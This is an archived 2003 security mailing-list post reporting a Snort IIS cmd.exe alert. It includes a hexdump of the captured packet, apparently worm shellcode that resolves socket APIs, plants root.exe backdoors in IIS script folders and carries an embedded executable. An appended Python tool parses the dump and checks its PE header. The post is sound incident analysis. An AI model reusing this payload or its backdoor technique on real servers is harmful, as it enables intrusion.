strange cmd.exe access
From: Q (quentyn_at_the-q.co.uk)
Date: 05/29/03
- Previous message: Russell Harding: "RE: A question for the list..."
- Next in thread: James C. Slora, Jr.: "RE: strange cmd.exe access"
- Maybe reply: James C. Slora, Jr.: "RE: strange cmd.exe access"
- Maybe reply: Jeff Adams: "RE: strange cmd.exe access"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Thu, 29 May 2003 20:10:25 +0100 (BST)
To: incidents@securityfocus.com
Hi, I saw this packet:
#(3 - 261684) [2003-05-09 19:43:00] [snort/1002] WEB-IIS cmd.exe access
IPv4: 194.204.X.X -> X.X.X.X
hlen=5 TOS=0 dlen=1472 ID=57174 flags=0 offset=0 TTL=116
chksum=60435
TCP: port=27761 -> dport: 80 flags=***A**** seq=915915841
ack=1210973630 off=5 res=0 win=17184 urp=0 chksum=16151
Payload: length = 1432
000 : FF 75 FC FF 55 F8 89 45 D8 E8 0F 00 00 00 47 6C .u..U..E......Gl
010 : 6F 62 61 6C 41 64 64 41 74 6F 6D 41 00 FF 75 FC obalAddAtomA..u.
020 : FF 55 F8 89 45 D4 E8 0C 00 00 00 43 6C 6F 73 65 .U..E......Close
030 : 48 61 6E 64 6C 65 00 FF 75 FC FF 55 F8 89 45 D0 Handle..u..U..E.
040 : E8 08 00 00 00 5F 6C 63 72 65 61 74 00 FF 75 FC ....._lcreat..u.
050 : FF 55 F8 89 45 CC E8 08 00 00 00 5F 6C 77 72 69 .U..E......_lwri
060 : 74 65 00 FF 75 FC FF 55 F8 89 45 C8 E8 08 00 00 te..u..U..E.....
070 : 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC FF 55 F8 89 ._lclose..u..U..
080 : 45 C4 E8 0E 00 00 00 47 65 74 53 79 73 74 65 6D E......GetSystem
090 : 54 69 6D 65 00 FF 75 FC FF 55 F8 89 45 C0 E8 0B Time..u..U..E...
0a0 : 00 00 00 57 53 32 5F 33 32 2E 44 4C 4C 00 FF 55 ...WS2_32.DLL..U
0b0 : F4 89 45 BC E8 07 00 00 00 73 6F 63 6B 65 74 00 ..E......socket.
0c0 : FF 75 BC FF 55 F8 89 45 B8 E8 0C 00 00 00 63 6C .u..U..E......cl
0d0 : 6F 73 65 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 osesocket..u..U.
0e0 : 89 45 B4 E8 0C 00 00 00 69 6F 63 74 6C 73 6F 63 .E......ioctlsoc
0f0 : 6B 65 74 00 FF 75 BC FF 55 F8 89 45 A4 E8 08 00 ket..u..U..E....
100 : 00 00 63 6F 6E 6E 65 63 74 00 FF 75 BC FF 55 F8 ..connect..u..U.
110 : 89 45 B0 E8 07 00 00 00 73 65 6C 65 63 74 00 FF .E......select..
120 : 75 BC FF 55 F8 89 45 A0 E8 05 00 00 00 73 65 6E u..U..E......sen
130 : 64 00 FF 75 BC FF 55 F8 89 45 AC E8 05 00 00 00 d..u..U..E......
140 : 72 65 63 76 00 FF 75 BC FF 55 F8 89 45 A8 E8 0C recv..u..U..E...
150 : 00 00 00 67 65 74 68 6F 73 74 6E 61 6D 65 00 FF ...gethostname..
160 : 75 BC FF 55 F8 89 45 9C E8 0E 00 00 00 67 65 74 u..U..E......get
170 : 68 6F 73 74 62 79 6E 61 6D 65 00 FF 75 BC FF 55 hostbyname..u..U
180 : F8 89 45 98 E8 10 00 00 00 57 53 41 47 65 74 4C ..E......WSAGetL
190 : 61 73 74 45 72 72 6F 72 00 FF 75 BC FF 55 F8 89 astError..u..U..
1a0 : 45 94 E8 0B 00 00 00 55 53 45 52 33 32 2E 44 4C E......USER32.DL
1b0 : 4C 00 FF 55 F4 89 45 90 E8 0E 00 00 00 45 78 69 L..U..E......Exi
1c0 : 74 57 69 6E 64 6F 77 73 45 78 00 FF 75 90 FF 55 tWindowsEx..u..U
1d0 : F8 89 45 8C C3 8B 45 84 69 C0 05 84 08 08 40 89 ..E...E.i.....@.
1e0 : 45 84 8D 84 04 78 56 34 12 F7 D8 C1 C0 08 C3 E8 E....xV4........
1f0 : E1 FF FF FF 3C 00 74 F7 3C FF 74 F3 C3 E8 ED FF ....<.t.<.t.....
200 : FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1 E3 10 E8 DC ................
210 : FF FF FF 8A F8 E8 D5 FF FF FF 8A D8 E8 B4 FF FF ................
220 : FF 83 E0 07 E8 20 00 00 00 FF FF FF FF 00 FF FF ..... ..........
230 : FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 00 FF ................
240 : FF 00 00 FF FF 00 00 FF FF 59 8B 04 81 23 D8 F7 .........Y...#..
250 : D0 23 85 58 FE FF FF 0B D8 80 FB 7F 74 9F 80 FB .#.X......t...
260 : E0 74 9A 3B 9D 58 FE FF FF 74 92 C3 68 04 01 00 .t.;.X...t..h...
270 : 00 8D 85 5C FE FF FF 50 FF 55 E0 8D BC 05 5C FE ...\...P.U....\.
280 : FF FF E8 09 00 00 00 5C 43 4D 44 2E 45 58 45 00 .......\CMD.EXE.
290 : 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 00 00 64 3A ^.....cj......d:
2a0 : 5C 69 6E 65 74 70 75 62 5C 73 63 72 69 70 74 73 \inetpub\scripts
2b0 : 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19 8D \root.exe...$...
2c0 : 85 5C FE FF FF 50 FF 55 DC 6A 01 E8 2B 00 00 00 .\...P.U.j..+...
2d0 : 64 3A 5C 70 72 6F 67 72 61 7E 31 5C 63 6F 6D 6D d:\progra~1\comm
2e0 : 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C 4D 53 41 44 on~1\system\MSAD
2f0 : 43 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19 C\root.exe...$..
300 : 8D 85 5C FE FF FF 50 FF 55 DC E8 BA 05 00 00 FC ..\...P.U.......
310 : 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 MZP.............
320 : B8 00 00 00 00 00 00 00 40 00 1A FC 00 00 01 FC ........@.......
330 : FC FC FC FC FC 00 00 50 45 00 00 4C 01 03 00 FD .......PE..L....
340 : 2A 25 29 00 00 00 00 00 00 00 00 E0 00 8F 81 0B *%).............
350 : 01 02 19 00 04 00 00 00 08 00 00 00 00 00 00 00 ................
360 : 10 00 00 00 10 00 00 00 20 00 00 00 00 40 00 00 ........ ....@..
370 : 10 00 00 00 04 00 00 01 00 00 00 00 00 00 00 03 ................
380 : 00 0A 00 00 00 00 00 00 40 00 00 00 04 00 00 00 ........@.......
390 : 00 00 00 02 00 00 00 00 00 10 00 00 20 00 00 00 ............ ...
3a0 : 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 ................
3b0 : 00 00 00 00 00 00 00 00 30 00 00 0C 01 FC FC FC ........0.......
3c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3d0 : 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 10 ................
3e0 : 00 00 00 04 00 00 00 08 00 00 00 00 00 00 00 00 ................
3f0 : 00 00 00 00 00 00 20 00 00 60 00 00 00 00 00 00 ...... ..`......
400 : 00 00 00 10 00 00 00 20 00 00 00 04 00 00 00 0C ....... ........
410 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 ..............@.
420 : 00 C0 00 00 00 00 00 00 00 00 00 10 00 00 00 30 ...............0
430 : 00 00 00 04 00 00 00 10 00 00 00 00 00 00 00 00 ................
440 : 00 00 00 00 00 00 40 00 00 C0 FC FC FC FC FC FC ......@.........
450 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
460 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
470 : FC FC FC FC FC FC 00 00 00 00 00 00 00 00 00 00 ................
480 : 00 00 00 00 00 00 68 04 01 00 00 68 D0 20 40 00 ......h....h. @.
490 : E8 61 01 00 00 8D B8 D0 20 40 00 BE 00 20 40 00 .a...... @... @.
4a0 : A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8 4C 01 00 00 ....j.h. @..L...
4b0 : E8 0C 00 00 00 68 C0 27 09 00 E8 31 01 00 00 EB .....h.'...1....
4c0 : EF 68 D8 24 40 00 68 3F 00 0F 00 6A 00 68 10 20 .h.$@.h?...j.h.
4d0 : 40 00 68 02 00 00 80 E8 32 01 00 00 0B C0 75 26 @.h.....2.....u&
4e0 : 6A 04 68 54 20 40 00 6A 04 6A 00 68 48 20 40 00 j.hT @.j.j.hH @.
4f0 : FF 35 D8 24 40 00 E8 0D 01 00 00 FF 35 D8 24 40 .5.$@.......5.$@
500 : 00 E8 0E 01 00 00 68 D8 24 40 00 68 3F 00 0F 00 ......h.$@.h?...
510 : 6A 00 68 58 20 40 00 68 02 00 00 80 E8 ED 00 00 j.hX @.h........
520 : 00 0B C0 75 55 BD 9C 20 40 00 E8 4C 00 00 00 BD ...uU.. @..L....
530 : A8 20 40 00 E8 42 00 00 00 6A 09 68 B8 20 40 00 . @..B...j.h. @.
540 : 6A 01 6A 00 68 B0 20 40 00 FF 35 D8 24 40 00 E8 j.j.h. @..5.$@..
550 : B4 00 00 00 6A 09 68 C4 20 40 00 6A 01 6A 00 68 ....j.h. @.j.j.h
560 : B4 20 40 00 FF 35 D8 24 40 00 E8 99 00 00 00 FF . @..5.$@.......
570 : 35 D8 24 40 00 E8 9A 00 00 00 C3 C7 05 D0 24 40 5.$@..........$@
580 : 00 00 04 00 00 68 D0 24 40 00 68 D0 20 40 00 68 .....h.$@.h. @.h
590 : D4 24 40 00 6A 00 55 FF .$@.j.U.
What is strange is that the cmd.exe / root.exe stuff is halfway through,
with some other code before it.
The IP it hit was not mapped to anything (I believe it is unused), so this
cannot have been part of another TCP conversation.
Any ideas?
-- There should be a sig here, but it got bored and wandered off
----------------------------------------------------------------------------
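The dump in the post is in the Snort-style "offset : 16 hex bytes  ascii" layout. The following is an added example (it is not code from the original post or from any of the replies): a small Python tool that parses that layout, lists the printable strings, and checks whether an embedded MZ/PE header is linked up the way a normal image is. The sample input is the 0x280-0x360 slice of the hexdump copied from the post; the function names and the result keys are this example's own.

```python
"""Parse a Snort-style payload hexdump, list its printable strings and check any
embedded MZ/PE header.  Added example; not code from the original post."""
import re

# Sample input, copied from the 0x280-0x360 slice of the hexdump in the post above.
# Any contiguous run of lines in the same "OFF : XX XX ... ascii" layout will do.
SAMPLE_DUMP = r"""
280 : FF FF E8 09 00 00 00 5C 43 4D 44 2E 45 58 45 00 .......\CMD.EXE.
290 : 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 00 00 64 3A ^.....cj......d:
2a0 : 5C 69 6E 65 74 70 75 62 5C 73 63 72 69 70 74 73 \inetpub\scripts
2b0 : 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19 8D \root.exe...$...
2c0 : 85 5C FE FF FF 50 FF 55 DC 6A 01 E8 2B 00 00 00 .\...P.U.j..+...
2d0 : 64 3A 5C 70 72 6F 67 72 61 7E 31 5C 63 6F 6D 6D d:\progra~1\comm
2e0 : 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C 4D 53 41 44 on~1\system\MSAD
2f0 : 43 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19 C\root.exe...$..
300 : 8D 85 5C FE FF FF 50 FF 55 DC E8 BA 05 00 00 FC ..\...P.U.......
310 : 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 MZP.............
320 : B8 00 00 00 00 00 00 00 40 00 1A FC 00 00 01 FC ........@.......
330 : FC FC FC FC FC 00 00 50 45 00 00 4C 01 03 00 FD .......PE..L....
340 : 2A 25 29 00 00 00 00 00 00 00 00 E0 00 8F 81 0B *%).............
350 : 01 02 19 00 04 00 00 00 08 00 00 00 00 00 00 00 ................
360 : 10 00 00 00 10 00 00 00 20 00 00 00 00 40 00 00 ........ ....@..
"""

HEX_BYTE = re.compile(r"[0-9A-Fa-f]{2}")


def parse_hexdump(text, bytes_per_line=16):
    """Return (base_offset, bytes) for a contiguous run of hexdump lines.

    Only tokens that are exactly two hex digits count, and at most bytes_per_line
    of them per line, so the trailing ASCII column is ignored even when it
    contains spaces or hex-looking characters.
    """
    base = expected = None
    out = bytearray()
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        off_str, _, rest = line.partition(":")
        offset = int(off_str, 16)
        if base is None:
            base = offset
        elif offset != expected:
            raise ValueError(f"gap in dump: expected {expected:#x}, got {offset:#x}")
        chunk = []
        for tok in rest.split():
            if len(chunk) == bytes_per_line or not HEX_BYTE.fullmatch(tok):
                break
            chunk.append(int(tok, 16))
        out += bytes(chunk)
        expected = offset + len(chunk)
    return base, bytes(out)


def extract_strings(data, base=0, min_len=4):
    """Return [(absolute_offset, text)] for runs of printable ASCII >= min_len."""
    found, start = [], None
    for i, b in enumerate(data):
        if 0x20 <= b < 0x7F:
            start = i if start is None else start
            continue
        if start is not None and i - start >= min_len:
            found.append((base + start, data[start:i].decode("ascii")))
        start = None
    if start is not None and len(data) - start >= min_len:
        found.append((base + start, data[start:].decode("ascii")))
    return found


def find_pe_header(data, base=0):
    """Locate 'MZ' and the 'PE\\0\\0' signature and sanity-check their linkage.

    In a well-formed image the DWORD at MZ+0x3C (e_lfanew) equals the distance
    from 'MZ' to 'PE\\0\\0'.  Offsets returned are absolute (base + index);
    fields that cannot be read from the available bytes stay None.
    """
    u16 = lambda i: int.from_bytes(data[i:i + 2], "little")
    u32 = lambda i: int.from_bytes(data[i:i + 4], "little")
    mz, pe = data.find(b"MZ"), data.find(b"PE\x00\x00")
    info = {"mz": None, "pe": None, "e_lfanew": None, "lfanew_points_to_pe": False,
            "machine": None, "sections": None, "magic": None,
            "entry_point": None, "image_base": None}
    if mz >= 0:
        info["mz"] = base + mz
        if mz + 0x40 <= len(data):
            info["e_lfanew"] = u32(mz + 0x3C)
            info["lfanew_points_to_pe"] = bool(pe >= 0 and mz + info["e_lfanew"] == pe)
    if pe >= 0:
        info["pe"] = base + pe
        opt = pe + 24                      # 4-byte signature + 20-byte IMAGE_FILE_HEADER
        if opt + 32 <= len(data):
            info["machine"] = u16(pe + 4)          # 0x14C = i386
            info["sections"] = u16(pe + 6)
            info["magic"] = u16(opt)               # 0x10B = PE32, 0x20B = PE32+
            info["entry_point"] = u32(opt + 16)    # AddressOfEntryPoint (RVA)
            info["image_base"] = u32(opt + 28)     # ImageBase, PE32 layout only
    return info


if __name__ == "__main__":
    base, data = parse_hexdump(SAMPLE_DUMP)
    for off, s in extract_strings(data, base):
        print(f"{off:#06x}  {s}")
    print(find_pe_header(data, base))
```

On this slice the string pass reports the three paths at 0x287, 0x29e and 0x2d0; the header check finds 'MZ' at 0x310 and 'PE\0\0' at 0x337, reads e_lfanew at MZ+0x3c as 0x0b818f00 (which does not point at the PE signature), while the COFF and optional header fields at 0x337 parse as machine 0x14c, 3 sections, PE32 magic, ImageBase 0x400000 and entry point RVA 0x1000. So the embedded executable cannot simply be carved from 'MZ' and handed to a stock PE parser; the header has to be read from the 'PE' signature. Run over the whole dump, the same string pass also lists the API names visible in the first part of the payload (GlobalAddAtomA through ExitWindowsEx), the "other code before it" the poster refers to.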